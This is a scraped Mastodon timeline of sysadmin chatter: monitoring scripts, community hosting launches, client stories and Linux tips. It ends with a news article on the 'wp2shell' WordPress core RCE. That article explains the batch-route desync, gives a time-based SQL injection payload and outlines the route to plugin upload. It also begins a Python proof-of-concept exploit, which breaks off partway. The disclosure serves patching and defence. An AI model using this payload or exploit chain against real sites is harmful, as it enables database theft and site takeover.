                                                                              Haben gerade einen Uptime-Watchdog für unseren Server gebaut. Stupid simple, kein extra Container, keine Web-GUI, kein LLM.

                                                                              Ein Shell-Skript mit curl und nc checkt alle 5 Minuten 9 HTTPS-Endpoints und 2 TCP-Ports. Alles ok? Skript output ist leer = still, man merkt nichts. Service down? Alert landet direkt im Element-Chat.

                                                                              Läuft als Hermes cronjob mit no_agent=true. Heißt: keine Tokens, kein LLM, kein overhead. Pure Shell die nur bei Problemen laut wird.

                                                                              Das Pattern: leere stdout = still, nicht-leere stdout = wird zugestellt, non-zero exit = Fehler-Alert. Genau so sollte Monitoring sein.

                                                                              Warum nicht Uptime Kuma? Weil es für einen Single-Admin mit 11 Services overkill ist. Zweite App die man updaten muss, zweite Instanz die selbst down gehen kann. Ein 50-Zeilen Shell-Skript erfüllt denselben Zweck.

                                                                                🗳
                                                                                webhat boosted

                                                                                [?]Windy city :verified: » 🌐
                                                                                @pheonix@hachyderm.io

                                                                                Do you think user interfaces these days have

                                                                                (select multiple)

                                                                                Too much white space:68
                                                                                Too verbose:18
                                                                                Too little information:88
                                                                                Too compact:18

                                                                                Closed

                                                                                  [?]Haack’s Networking » 🌐
                                                                                  @oemb1905@gnulinux.social

                                                                                  :haacknet: Haack's Networking :haacknet:

                                                                                  🔗 Haack's Streams: content.haacksnetworking.org/w

                                                                                  This is a bookmarked post of my live streams. This playlist is public - feel free to share and spread the word! The more the merrier ;)

                                                                                    [?]Haack’s Networking » 🌐
                                                                                    @oemb1905@gnulinux.social

                                                                                    :haacknet: Haack's Networking :haacknet:

                                                                                    The PubGLUG Nextcloud is live and open for registration. All accounts are manually approved and users must be 18 years of age and/or older. This instance is a community effort and part of the greater set of offerings that Haack's Networking provides.

                                                                                    🔗 The PubGLUG Nextcloud: cloud.gnulinux.vip
                                                                                    🔗 All PubGLUG Services: haacksnetworking.dev

                                                                                    It is my hope that in offering a community Nextcloud with open and moderated registration ... that this will result in more users choosing and/or offerings for groupware (contacts, calendars, etc.). Those interested in setup notes and/or seeking assistance are encouraged to come chat on Matrix (link above). This instance has the following features:

                                                                                    ▶️ Server-side encryption ensures that content on External Storage will be encrypted whether users set it up or not
                                                                                    ↪️ E2E encryption provides users an easy way to use the Nextcloud sync client to create shares that even the sysadmin cannot see
                                                                                    💾 Users are given 50GB of storage from a large btrfs platter-based pool; users may request more in DMs with valid use-cases; users may attach their own external storage.
                                                                                    🔦 This instance is designed to assist in pulling people off iCloud, Google, etc. and teach/persuade them how to self-host NC themselves

                                                                                    ✨️This is early registration. Some policies are not yet finished, some bugs remain, and we might find that some things don't work. Please be patient. With that said, feel free to sign up and let me know when you've joined. We are at the mall all day, but I've got access for approvals on the phone.

                                                                                    ✍️ By using this instance, you agree to the Terms of Service: cloud.gnulinux.vip/index.php/s

                                                                                    gnu/linux club icon and logo, artwork by @migglesmilkes aka Dascha

                                                                                    Alt...gnu/linux club icon and logo, artwork by @migglesmilkes aka Dascha

                                                                                      [?]Haack’s Networking » 🌐
                                                                                      @oemb1905@gnulinux.social

                                                                                      :haacknet: Haack's Networking :haacknet:

                                                                                      🔗 content.haacksnetworking.org/w

                                                                                      ✍️ We are live folks ... the Nextcloud and Gitlab are done, email server is complete, and now just looking over smaller settings and performance. Set a new world record for stupid today when I actually installed two web servers on the Nextcloud using my own tutorial. The jokes literally write themselves ❣️

                                                                                      picture of my tutorial (actually in print) where you can see apt install nginx apache2 right in the dang tutorial ... pulled from wiki.haacksnetworking.org

                                                                                      Alt...picture of my tutorial (actually in print) where you can see apt install nginx apache2 right in the dang tutorial ... pulled from wiki.haacksnetworking.org

                                                                                        AodeRelay boosted

                                                                                        [?]weed stallman » 🌐
                                                                                        @incentive@mastodon.circlewithadot.net

                                                                                        Apparently it's sysadmin day

                                                                                        Who's hiring? Lol

                                                                                          [?]skotperez » 🌐
                                                                                          @skotperez@voragine.net

                                                                                          Running X window graphical application over ssh session

                                                                                          [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                          @mikebabcock@floss.social

                                                                                          If you work with or as a this video might hit home a few times.

                                                                                          youtu.be/I7IHInNJZvE

                                                                                            [?]BastilleBSD :freebsd: » 🌐
                                                                                            @BastilleBSD@fosstodon.org

                                                                                            Happy Sysadmin Appreciation Day

                                                                                            To all the sysadmins quietly keeping the lights on, we salute you.

                                                                                            A "UNIX System Park" t-shirt, with a silhouette of characters Lex and Tim. Lex is saying, "IT'S A UNIX SYSTEM. I KNOW THIS!" and then the text, "REBOOTING SYSTEM...", in a parody of the 'Jurassic Park' logo.

                                                                                            Alt...A "UNIX System Park" t-shirt, with a silhouette of characters Lex and Tim. Lex is saying, "IT'S A UNIX SYSTEM. I KNOW THIS!" and then the text, "REBOOTING SYSTEM...", in a parody of the 'Jurassic Park' logo.

                                                                                              AodeRelay boosted

                                                                                              [?]Larvitz :fedora: » 🌐
                                                                                              @Larvitz@burningboard.net

                                                                                              I really don’t need any more peers for my AS201379! (Okay, maybe a few more...)

                                                                                              Started back in December 2025, and now this "little" infrastructure is running:

                                                                                              14 individual eBGP sessions
                                                                                              3 Internet Exchanges
                                                                                              Multiple transit providers
                                                                                              110+ direct peers

                                                                                              All 100% IPv6 (2a06:9801:1c::/48) because legacy IP belongs in the last century.

                                                                                              Powered entirely by FreeBSD :freebsd: 4 routers on 15.1-RELEASE running FRR and PF.

                                                                                                [?]Haack’s Networking » 🌐
                                                                                                @oemb1905@gnulinux.social

                                                                                                :haacknet: Haack's Networking :haacknet:

                                                                                                🔗 content.haacksnetworking.org/w

                                                                                                ✍️ We are live folks ... today's task is to setup the email server and to fine tune both the nextcloud and gitlab for public registration. Feel free to come by and chill. Sipping coffee, just finished breakfast. It's time to hack‼️

                                                                                                  [?]Haack’s Networking » 🌐
                                                                                                  @oemb1905@gnulinux.social

                                                                                                  :haacknet: Haack's Networking :haacknet:

                                                                                                  🔗 content.haacksnetworking.org/w

                                                                                                  ✍️ We are live folks ... finishing up the nextcloud, polishing up the VM, setting up storage. Fixing reported errors. Come on by, chat needs some love. Music and popcorn are free ❣️

                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                    A few months ago, a client asked me to shave about €200 a month off our agreement. "We’re trying to cut back on expenses", he said, "to boost our cash flow." I was hesitant, but hey, I agreed.

                                                                                                    Fast forward to this morning: one of his team members calls me asking for help because - and I quote - "both Claude and ChatGPT are giving me answers that just don't feel right."

                                                                                                    I asked for a little context, only to find out they had upgraded to the top-tier plans for both AIs so they could "solve problems on their own without bothering me."

                                                                                                    So, I dropped my client a line: we either revert to our original agreement, or we wrap up this collaboration effective immediately.

                                                                                                    Asking me for a discount just to throw far more money at AI subscriptions - only to call me anyway when the bots fail - is, to say the least, a slap (or slop?) in the face.

                                                                                                      AodeRelay boosted

                                                                                                      [?]weed stallman » 🌐
                                                                                                      @incentive@mastodon.circlewithadot.net

                                                                                                      Would love to connect with accounts that are either Mastodon admins or Relay admins. Need more in my feed related to that.

                                                                                                        3 ★ 0 ↺

                                                                                                        [?]oldsysops » 🌐
                                                                                                        @oldsysops@social.dk-libre.fr

                                                                                                        @oldsysops@social.dk-libre.fr fun fact : je suis le seul membre de la famille à ne pas emmener mon ordinateur en vacances...
                                                                                                        2 semaines de vraie coupure avec le boulot !
                                                                                                        (j'ai un plan b au cas où il faut se connecté mais c'est plus pour avoir l'esprit tranquille).
                                                                                                        (mais je me soigne...)

                                                                                                          [?]Stefano Marinelli » 🌐
                                                                                                          @stefano@mastodon.bsd.cafe

                                                                                                          A few days ago, a client’s data center (well, actually a server room) "vanished" overnight. My monitoring showed that all devices were unreachable. Not even the ISP routers responded, so I assumed a sudden connectivity drop. The strange part? Not even via 4G.

                                                                                                          I then suspected a power failure, but the UPS should have sent an alert.

                                                                                                          The office was closed for the holidays, but I contacted the IT manager anyway. He was home sick with a serious family issue, but he got moving.

                                                                                                          To make a long story short: the company deals in gold and precious metals. They have an underground bunker with two-meter thick walls. They were targeted by a professional gang. They used a tactic seen in similar hits: they identify the main power line, tamper with it at night, and send a massive voltage spike through it.

                                                                                                          The goal is to fry all alarm and surveillance systems. Even if battery-backed, they rarely survive a surge like that. Thieves count on the fact that during holidays, owners are away and fried systems can't send alerts. Monitoring companies often have reduced staff and might not notice the "silence" immediately.

                                                                                                          That is exactly what happened here. But there is a "but": they didn't account for my Uptime Kuma instance monitoring their MikroTik router, installed just weeks ago. Since it is an external check, it flagged the lack of response from all IPs without needing an internal alert to be triggered from the inside.

                                                                                                          The team rushed to the site and found the mess. Luckily, they found an emergency electrical crew to bypass the damage and restore the cameras and alarms. They swapped the fried server UPS with a spare and everything came back up.

                                                                                                          The police warned that the chances of the crew returning the next night to "finish" the job were high, though seeing the systems back online would likely make them move on. They also warned that thieves sometimes break in just to destroy servers to wipe any video evidence.

                                                                                                          Nothing happened in the end. But in the meantime, I had to sync all their data off-site (thankfully they have dual 1Gbps FTTH), set up an emergency cluster, and ensure everything was redundant.

                                                                                                          Never rely only on internal monitoring. Never.

                                                                                                            [?]Haack’s Networking » 🌐
                                                                                                            @oemb1905@gnulinux.social

                                                                                                            RE: gnulinux.social/@oemb1905/1166

                                                                                                            :haacknet: Haack's Networking :haacknet:

                                                                                                            🖼️ A wild NVIDIA RTX 2000 w/ 16GB and native AV1 transcoding support has arrived‼️

                                                                                                            ✍️ We are pleased to announce that we secured this excellent condition used GPU for the PeerTube instance. After @oemb1905 traveled up to Brown Rice Data Center and installed it and passed it through to the virtualized PT, Lord @sen took care of customizing the JSON for the ffmpeg logic and did some tinkering under the hood so that PT would be efficient in its choices. Efficient hardware AV1 transcoding is now live.

                                                                                                            💡 We still have slots open for registration and the quoted post below shows our starting quotas and limits. More is available upon request or for justified use-cases. As a reminder, the GNUTube requires members to be posting either floss content and/or for supporting floss organizations. Linux gamers and benchmarkers are also welcome.

                                                                                                            💰️ Already a satisified member and want to give back?
                                                                                                            ↪️ liberapay.com/oemb1905/
                                                                                                            🔗 gnulinux.tube

                                                                                                            [?]Haack’s Networking » 🌐
                                                                                                            @oemb1905@gnulinux.social

                                                                                                            🤔Are you an or content creator?

                                                                                                            👀Are you an or organization that needs a place to host your meetups/presentations?

                                                                                                            🔥GNU/Linux Tube has open registration‼️

                                                                                                            gnulinux.tube

                                                                                                            - 10GB daily upload default
                                                                                                            - 100GB video quota default
                                                                                                            - Custom vp9 & opus CPU transcoding
                                                                                                            - Quarterly updates & maintenance
                                                                                                            - All volunteer devs @sen @oemb1905

                                                                                                            Donate: liberapay.com/oemb1905/

                                                                                                                AodeRelay boosted

                                                                                                                [?]BlablaLinux » 🌐
                                                                                                                @blablalinux@mastodon.blablalinux.be

                                                                                                                Le niveau ultime de l’automatisation ?
                                                                                                                Quand tu reçois une notification Gotify pour une tâche de maintenance automatisée que tu avais toi-même codée… et que tu avais complètement oubliée ! 😂
                                                                                                                Merci au "moi du passé" d'avoir pensé à tout. L'infra bosse pendant que je bosse !

                                                                                                                  [?]BlablaLinux » 🌐
                                                                                                                  @blablalinux@mastodon.blablalinux.be

                                                                                                                  La suite du bilan : après les nœuds et les LXC Proxmox, c'est au tour de Watchtower de faire le ménage dans mes conteneurs. Ça tourne tout seul ! 🚀 🤖

                                                                                                                    [?]Haack’s Networking » 🌐
                                                                                                                    @oemb1905@gnulinux.social

                                                                                                                    Premise: LLM-gen-AI is here to stay.

                                                                                                                    Therefore, gnulinux devs ultimately have two logical choices: a) reject OR b) accept. If you reject, you are ultimately - in my opinion - denying or encouraging the denial of helpful tooling for lower SES groups. Upper SES groups already have access to these tools ... choosing to abstain is a position derived from privilege. Lower SES groups need access and equity to the same tools that academic/elite circles have access to. This is why we need fully floss AI that's accessible, uses a non-token and non-gouging pricing model (or is free / donated), and relies on distributed leadership and community support/building. Also, green data centers ...

                                                                                                                      AodeRelay boosted

                                                                                                                      [?]weed stallman » 🌐
                                                                                                                      @incentive@mastodon.circlewithadot.net

                                                                                                                      A re-introduction as it's been some time since I posted my last one.

                                                                                                                      By day I am an unemployed linux sysadmin and devops engineer currently looking for new work. I specifically enjoy building automated deployments using Ansible.

                                                                                                                      By night I've been an electronic music producer for ~25 years, making music inspired by kosmische, noise, idm, and ambient.

                                                                                                                      Always looking to connect with others with similar interests.

                                                                                                                        0 ★ 1 ↺
                                                                                                                        Fred de CLX boosted

                                                                                                                        [?]oldsysops » 🌐
                                                                                                                        @oldsysops@social.dk-libre.fr

                                                                                                                        forcément, faut que je poses mes vacances pour qu'il y ai un incident sur les serveurs

                                                                                                                          AodeRelay boosted

                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                          L'automatisation sous Linux, c'est quand même une vraie merveille ! 😎

                                                                                                                            [?]Haack’s Networking » 🌐
                                                                                                                            @oemb1905@gnulinux.social

                                                                                                                            It's been roughly a year since I switched three production servers to btrfs from zfs. No issues at all, less ram consumption, slightly quicker performance on backups, and no dkms rebuilding shyze when major upgrades come out. Pretty awesome.

                                                                                                                              AodeRelay boosted

                                                                                                                              [?]Stefano Marinelli » 🌐
                                                                                                                              @stefano@mastodon.bsd.cafe

                                                                                                                              Today, the Linuxulator did its job, and it did it very well.
                                                                                                                              A client is experimenting with moving from Docker to FreeBSD and jails, and they seem very happy with it so far.
                                                                                                                              The issue is that part of their build process - as so often happens - relies on Node dependencies that only compile on Linux, macOS, etc., but not on FreeBSD, due to a missing binary that isn't provided for it. Currently, they build on their local machines and push the output to the server, but sometimes they need to make quick changes on the fly.

                                                                                                                              So, I set up a Linux jail (Ubuntu) using BastilleBSD, installed the dependencies, set up a bind mount, and granted them access to the jail. The result: now they can compile right from there too, improving their overall workflow.

                                                                                                                              The Linuxulator - and even more so, illumos's lx zones - are truly remarkable pieces of technology.

                                                                                                                               

                                                                                                                                [?]Jordan » 🌐
                                                                                                                                @jordan@mastodon.subj.am

                                                                                                                                I stand up from working all day on Subjam server infra updates & PR, to take a break in a cooler room. I did good and need to rest my eyes.

                                                                                                                                I pick up my phone and start to walk away from my desk, and immediately receive an e-mail telling me there was a bind9 security update.

                                                                                                                                🙃

                                                                                                                                The life of a sysadmin is getting more and more demanding by the day.

                                                                                                                                lists.debian.org/debian-securi

                                                                                                                                  [?]Haack’s Networking » 🌐
                                                                                                                                  @oemb1905@gnulinux.social

                                                                                                                                  :haacknet: Haack's Networking :haacknet:

                                                                                                                                  📰 GNU/Linux Pics
                                                                                                                                  🔗 gnulinux.pics

                                                                                                                                  ⭐️ We are re-opening the GNU/Linux Pics Pixelfed instance. It is not yet discoverable but we encourage folks to join and use web-based access for now.

                                                                                                                                  ⚡️ We are working with the Pixelfed team to ensure discovery becomes active. It's unclear what's causing the issue, but rest assured we are committed to resolving it.

                                                                                                                                  ✍️ If you are interested in how it was setup and built, please review the blog post here:

                                                                                                                                  💡 tech.haacksnetworking.org/2026

                                                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                                                    The feud is finally over. And it's honestly hilarious.

                                                                                                                                    Recap: Last week, a client forwarded me a request from the CRM company's support to verify the presence and content of a file in a specific directory.
                                                                                                                                    I SSH'd in, ran ls, pwd, and cat on the file, then copied and pasted the output.

                                                                                                                                    That kicked off a back-and-forth demands for "screenshots." The more I explained (through the client) that all the raw text was right there, the more this guy kept demanding a screenshot - becoming increasingly rude, arrogant, and condescending.
                                                                                                                                    Finally, I told the client: "Put me in direct contact with him, I'll handle it."
                                                                                                                                    He did, but the guy, completely unfazed, kept demanding screen grabs from the client, ignoring me entirely.

                                                                                                                                    I refused to give in. In my field, I love working with people who know more than me so I can learn, and with people who know less so I can teach - or at least share my experience. But arrogance combined with stupidity is something I just can't stomach, especially when they come hand in hand.

                                                                                                                                    Finally, this morning, he comes back at it again. My client, completely fed up, takes a screenshot of the text I had emailed him earlier and sends it over.

                                                                                                                                    Only then did the guy notice a typo and suggest how to fix it.

                                                                                                                                    What a week, huh?
Captain, it's Wednesday

                                                                                                                                    Alt...What a week, huh? Captain, it's Wednesday

                                                                                                                                      [?]Monospace Mentor » 🌐
                                                                                                                                      @monospace@floss.social

                                                                                                                                      Linux tip: Use `systemctl --failed` to quickly identify which services failed to start after boot. Much faster than scrolling through journal logs when troubleshooting system issues.

                                                                                                                                        [?]Monospace Mentor » 🌐
                                                                                                                                        @monospace@floss.social

                                                                                                                                        Linux tip: Set `HISTCONTROL=ignoredups:erasedups` in your init script to prevent duplicate commands cluttering your history. Clean history makes command recall much more efficient.

                                                                                                                                          [?]Monospace Mentor » 🌐
                                                                                                                                          @monospace@floss.social

                                                                                                                                          Shell tip: `${var%suffix}` removes the shortest matching suffix. `${var%%suffix}` removes the longest. `${var#prefix}` and `${var##prefix}` work the same for prefixes. Mnemonic: # comes before % on the keyboard.

                                                                                                                                            [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                            @mikebabcock@floss.social

                                                                                                                                            @kn4ntu usage example I have right now: databackup@.service that does xfsdump backups of level N where N is specified by databackup@N.timer which lets me set how often each level runs.

                                                                                                                                              [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                              @mikebabcock@floss.social

                                                                                                                                              @kn4ntu given that models *can* make mistakes, I refuse to let them run things on their own without supervision on computers I care about.
                                                                                                                                              I also don't use anymore because systemd timers exist.
                                                                                                                                              The timer format is gross, but it does have a bunch of cool features.

                                                                                                                                                [?]Manu » 🌐
                                                                                                                                                @manu@social.manu.quebec

                                                                                                                                                7 Open Source Infrastructure Projects Worth Watching in 2026

                                                                                                                                                Chapters :
                                                                                                                                                00:00 Introduction
                                                                                                                                                01:16 Pi-hole HA
                                                                                                                                                02:37 Sencho Docker Compose Manager
                                                                                                                                                03:48 Portabase Docker Volume Backups
                                                                                                                                                05:00 Incus System Containers
                                                                                                                                                06:06 Omni for Talos Kubernetes
                                                                                                                                                07:08 NetBird Zero Trust Networking
                                                                                                                                                08:27 Pangolin Secure Remote Access
                                                                                                                                                09:47 Why these projects matter
                                                                                                                                                11:32 Final thoughts and community discussion

                                                                                                                                                #SysAdmin #OpenSource #Docker #DockerCompose #Kubernetes #VPN

                                                                                                                                                  [?]thecybersecguru » 🌐
                                                                                                                                                  @thecybersecguru@infosec.exchange

                                                                                                                                                  🚨 CRITICAL: WordPress Core "wp2shell" RCE

                                                                                                                                                  A single anonymous HTTP request can lead to Remote Code Execution on vulnerable WordPress Core installations.

                                                                                                                                                  ⚠️ No plugins.
                                                                                                                                                  ⚠️ No themes.
                                                                                                                                                  ⚠️ No authentication required.

                                                                                                                                                  Tracked as:
                                                                                                                                                  🔴 CVE-2026-63030 (REST API Batch Route Confusion → RCE)
                                                                                                                                                  🔴 CVE-2026-60137 (Facilitated SQL Injection)

                                                                                                                                                  Affected versions
                                                                                                                                                  • WordPress 6.9.0–6.9.4
                                                                                                                                                  • WordPress 7.0.0–7.0.1

                                                                                                                                                  ✅ Update immediately to WordPress 6.9.5 or 7.0.2. Due to the severity, WordPress has enabled forced automatic security updates for affected installations.

                                                                                                                                                  🔗 Full technical analysis:
                                                                                                                                                  thecybersecguru.com/news/wordp

                                                                                                                                                  [?]The CyberSec Guru » 🌐
                                                                                                                                                  @guru@thecybersecguru.com

                                                                                                                                                  Critical WordPress Core Flaw “wp2shell” Enables No-Auth Remote Code Execution on Default Installs

                                                                                                                                                  A critical WordPress core vulnerability dubbed wp2shell allows unauthenticated remote code execution on default installs. Update to 7.0.2 for patch [SENSITIVE CONTENT]

                                                                                                                                                  A newly disclosed vulnerability chain in WordPress core has prompted one of the project’s most aggressive emergency responses in recent years.

                                                                                                                                                  Security researchers have revealed a flaw, dubbed wp2shell, that allows an unauthenticated attacker to execute code against vulnerable WordPress installations. Unlike the majority of WordPress compromises that depend on outdated plugins or vulnerable themes, this issue resides entirely within WordPress core and affects even a freshly installed website with no plugins and no custom themes.

                                                                                                                                                  To limit exposure, the WordPress Security Team released WordPress 7.0.2 and WordPress 6.9.5, while simultaneously enabling forced automatic security updates for affected installations. This is a mechanism WordPress reserves only for its most severe security incidents.

                                                                                                                                                  Although there are currently no confirmed reports of active exploitation, security professionals expect attackers to begin reverse engineering the patch quickly. Administrators should treat this as an urgent patching priority.

                                                                                                                                                  What Is wp2shell?

                                                                                                                                                  The vulnerability, publicly known as wp2shell, is a pre-authentication Remote Code Execution (RCE) chain affecting recent versions of WordPress.

                                                                                                                                                  Unlike authenticated vulnerabilities that require an attacker to first obtain administrator credentials, this flaw can be triggered through a single anonymous HTTP request.

                                                                                                                                                  That distinction dramatically changes the risk profile.

                                                                                                                                                  An attacker does not need:

                                                                                                                                                  • Administrator privileges
                                                                                                                                                  • User credentials
                                                                                                                                                  • Installed plugins
                                                                                                                                                  • A vulnerable theme
                                                                                                                                                  • Any prior access to the website

                                                                                                                                                  If the site is running an affected version, the vulnerable code is already present.

                                                                                                                                                  Researchers from Assetnote, part of Searchlight Cyber, discovered the issue and reported it responsibly through WordPress’ HackerOne bug bounty program.

                                                                                                                                                  📬 Stay Ahead of Cyber Threats

                                                                                                                                                  Get the latest cybersecurity news, critical vulnerabilities, threat intelligence, tutorials, and exclusive giveaways delivered straight to your inbox. No spam. Unsubscribe anytime.

                                                                                                                                                  Subscribe to the Newsletter →

                                                                                                                                                  Affected Versions

                                                                                                                                                  The vulnerability impacts only newer WordPress releases.

                                                                                                                                                  Version

                                                                                                                                                  Status

                                                                                                                                                  6.8.x and earlier

                                                                                                                                                  Not affected by the RCE chain

                                                                                                                                                  6.9.0 – 6.9.4

                                                                                                                                                  Vulnerable

                                                                                                                                                  7.0.0 – 7.0.1

                                                                                                                                                  Vulnerable

                                                                                                                                                  6.9.5

                                                                                                                                                  Fixed

                                                                                                                                                  7.0.2

                                                                                                                                                  Fixed

                                                                                                                                                  7.1 Beta 2

                                                                                                                                                  Fixed

                                                                                                                                                  WordPress 6.8.6 was released separately to address another SQL injection vulnerability but is not vulnerable to the wp2shell RCE chain.

                                                                                                                                                  Why This Vulnerability Is Different

                                                                                                                                                  WordPress vulnerabilities are unfortunately common, but they almost always originate from third-party components.

                                                                                                                                                  Historically, most large-scale WordPress compromises have involved:

                                                                                                                                                  • Outdated plugins
                                                                                                                                                  • Poorly written themes
                                                                                                                                                  • Exposed administrator panels
                                                                                                                                                  • Weak credentials

                                                                                                                                                  wp2shell breaks that pattern.

                                                                                                                                                  The vulnerable component exists inside WordPress itself, meaning every affected installation shares the same attack surface regardless of what plugins are installed.

                                                                                                                                                  A default installation is sufficient.

                                                                                                                                                  That makes patch adoption significantly more important than plugin management in this case.

                                                                                                                                                  Technical Analysis

                                                                                                                                                  WP2Shell Infographic

                                                                                                                                                  The Vulnerable Component

                                                                                                                                                  The attack begins with WordPress’ REST API endpoint:

                                                                                                                                                  POST /wp-json/batch/v1

                                                                                                                                                  The REST Batch API allows multiple API requests to be bundled into a single HTTP request.

                                                                                                                                                  Internally, WordPress validates each sub-request individually before dispatching it to its corresponding handler.

                                                                                                                                                  Under normal circumstances, every request should remain associated with the handler that originally validated it.

                                                                                                                                                  The vulnerability arises because that association can become corrupted.

                                                                                                                                                  Route Confusion

                                                                                                                                                  Introduced in WordPress 5.6, the REST Batch API (/wp-json/batch/v1) allows clients to bundle multiple sub-requests into a single HTTP call. The core function serve_batch_request_v1() processes these by building two parallel arrays: $matches (the matched route handler) and $validation (the validation result)

                                                                                                                                                  The vulnerability stems from a desynchronization bug. If a sub-request path fails PHP’s wp_parse_url() (for example, by passing a malformed path like ///), it generates a WP_Error that is appended to the $validation array, but not to the $matches array. This causes the arrays to fall out of step. When the dispatcher iterates through the requests using a shared index offset, it inadvertently dispatches a sub-request under the next sub-request’s handler. This is what Researchers identified and what WordPress describes as a REST API batch-route confusion vulnerability.

                                                                                                                                                  Internally, the batch dispatcher builds two arrays:

                                                                                                                                                  • Matched route handlers
                                                                                                                                                  • Validation results

                                                                                                                                                  These arrays are expected to remain perfectly synchronized.

                                                                                                                                                  However, malformed request paths can cause validation entries to be inserted without corresponding route handlers.

                                                                                                                                                  Once the arrays lose alignment, subsequent requests may execute under the wrong handler.

                                                                                                                                                  Conceptually, the process looks like this:

                                                                                                                                                  Incoming Batch Request

                                                                                                                                                  Validation Array

                                                                                                                                                  Request A

                                                                                                                                                  Request B

                                                                                                                                                  Request C

                                                                                                                                                  Route Handler Array

                                                                                                                                                  Handler A

                                                                                                                                                  Handler B

                                                                                                                                                  Alignment Lost

                                                                                                                                                  After synchronization breaks, a request validated under one endpoint may execute using another endpoint’s permissions and processing logic.

                                                                                                                                                  This is the foundation of the route confusion vulnerability.

                                                                                                                                                  wp2shell PoC. Credit – @assetnote on X/Twitter

                                                                                                                                                  From Route Confusion to SQL Injection

                                                                                                                                                  The disclosed proof of concept demonstrates how attackers leverage this confusion to reach an unexpected SQL injection path.

                                                                                                                                                  Instead of processing a request through the intended REST endpoint, WordPress eventually dispatches user-controlled parameters into a vulnerable query.

                                                                                                                                                  One parameter in particular becomes important:

                                                                                                                                                  author_exclude

                                                                                                                                                  Normally, this parameter would not be accepted by the endpoint handling user requests.

                                                                                                                                                  Because route validation becomes confused, however, the parameter reaches WP_Query, where it is interpreted as:

                                                                                                                                                  author__not_in

                                                                                                                                                  On vulnerable versions, that value is incorporated into SQL in a manner that enables injection.

                                                                                                                                                  Researchers demonstrated:

                                                                                                                                                  • Boolean-based SQL injection
                                                                                                                                                  • Time-based blind SQL injection

                                                                                                                                                  without requiring authentication.

                                                                                                                                                  PoC (Proof of Concept Code)

                                                                                                                                                  The wp2shell PoC elegantly exploits this desynchronization twice to achieve unauthenticated SQL injection:

                                                                                                                                                  1. Outer Batch: A POST /wp/v2/posts request is dispatched, but due to the desync, it is handled by the batch processor itself. Because it was initially validated as a posts request, its internal requests body bypasses the strict batch schema validation, allowing it to smuggle GET requests (bypassing the batch POST-only allow-list).
                                                                                                                                                  2. Inner Batch: Inside this smuggled payload, a GET /wp/v2/users request is sent with a fabricated author_exclude parameter. The users schema does not define this parameter, so WordPress passes the raw string untouched. However, due to a second desync, this request is executed under the posts get_items() handler. There, author_exclude is mistakenly mapped to the WP_Query author__not_in variable, which is directly interpolated into the SQL query as a string.

                                                                                                                                                  By injecting a payload like 0) OR SLEEP(3)-- -, an attacker can achieve reliable, time-based blind SQL injection without any authentication. This allows for the extraction of administrator password hashes, which can then be cracked offline and used to upload a malicious plugin, completing the RCE chain.

                                                                                                                                                  Below is a unified, single-file Python 3.8+ PoC. It requires no third-party dependencies and implements the check, read, and shell commands described in the original advisory.

                                                                                                                                                  ⚠️ Disclaimer: This tool is provided for educational purposes and authorized security testing only. Do not use this against any system you do not own or have explicit written permission to test. Some parts of code have been intentionally altered for making it suitable for educational purposes

                                                                                                                                                  wp2shell.py

                                                                                                                                                  #!/usr/bin/env python3

                                                                                                                                                  """

                                                                                                                                                  wp2shell-poc: Independent proof-of-concept for CVE-2026-63030

                                                                                                                                                  Unauthenticated WordPress REST batch route-confusion SQL injection.

                                                                                                                                                  Requires Python 3.8+. No third-party dependencies.

                                                                                                                                                  """

                                                                                                                                                  import argparse

                                                                                                                                                  import http.cookiejar

                                                                                                                                                  import io

                                                                                                                                                  import json

                                                                                                                                                  import re

                                                                                                                                                  import secrets

                                                                                                                                                  import statistics

                                                                                                                                                  import sys

                                                                                                                                                  import time

                                                                                                                                                  import urllib.error

                                                                                                                                                  import urllib.parse

                                                                                                                                                  import urllib.request

                                                                                                                                                  import uuid

                                                                                                                                                  import zipfile

                                                                                                                                                  from dataclasses import dataclass

                                                                                                                                                  from typing import Any, Callable, Dict, List, Optional, Tuple

                                                                                                                                                  # --- Constants & Helpers ---

                                                                                                                                                  _DESYNC_PRIMER = {"method": "POST", "path": "///"}

                                                                                                                                                  _BATCH_MARKER_CODES = ("parse_path_failed", "block_cannot_read", "rest_batch_not_allowed")

                                                                                                                                                  def _progress(text: str) -> None:

                                                                                                                                                  sys.stdout.write(f"\rExtracting: {text}")

                                                                                                                                                  sys.stdout.flush()

                                                                                                                                                  def _clear_progress() -> None:

                                                                                                                                                  sys.stdout.write("\r" + " " * 60 + "\r")

                                                                                                                                                  sys.stdout.flush()

                                                                                                                                                  def _info(msg: str) -> None:

                                                                                                                                                  print(f"[*] {msg}")

                                                                                                                                                  def _good(msg: str) -> None:

                                                                                                                                                  print(f"[+] {msg}")

                                                                                                                                                  def _bad(msg: str) -> None:

                                                                                                                                                  print(f"[-] {msg}")

                                                                                                                                                  def _warn(msg: str) -> None:

                                                                                                                                                  print(f"[!] {msg}")

                                                                                                                                                  # --- HTTP Client ---

                                                                                                                                                  class TargetError(Exception):

                                                                                                                                                  pass

                                                                                                                                                  @dataclass

                                                                                                                                                  class Response:

                                                                                                                                                  status: int

                                                                                                                                                  elapsed: float

                                                                                                                                                  body: str

                                                                                                                                                  def json(self) -> Any:

                                                                                                                                                  return json.loads(self.body)

                                                                                                                                                  class BatchClient:

                                                                                                                                                  def __init__(self, base_url: str, *, timeout: float = 30.0, rest_route: bool = False, proxy: Optional[str] = None, user_agent: str = "wp2shell"):

                                                                                                                                                  self.base_url = base_url.rstrip("/")

                                                                                                                                                  self.timeout = timeout

                                                                                                                                                  self.rest_route = rest_route

                                                                                                                                                  self.user_agent = user_agent

                                                                                                                                                  handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []

                                                                                                                                                  self._opener = urllib.request.build_opener(*handlers)

                                                                                                                                                  @property

                                                                                                                                                  def endpoint(self) -> str:

                                                                                                                                                  if self.rest_route:

                                                                                                                                                  return f"{self.base_url}/?rest_route=/batch/v1"

                                                                                                                                                  return f"{self.base_url}/wp-json/batch/v1"

                                                                                                                                                  def post(self, payload: dict) -> Response:

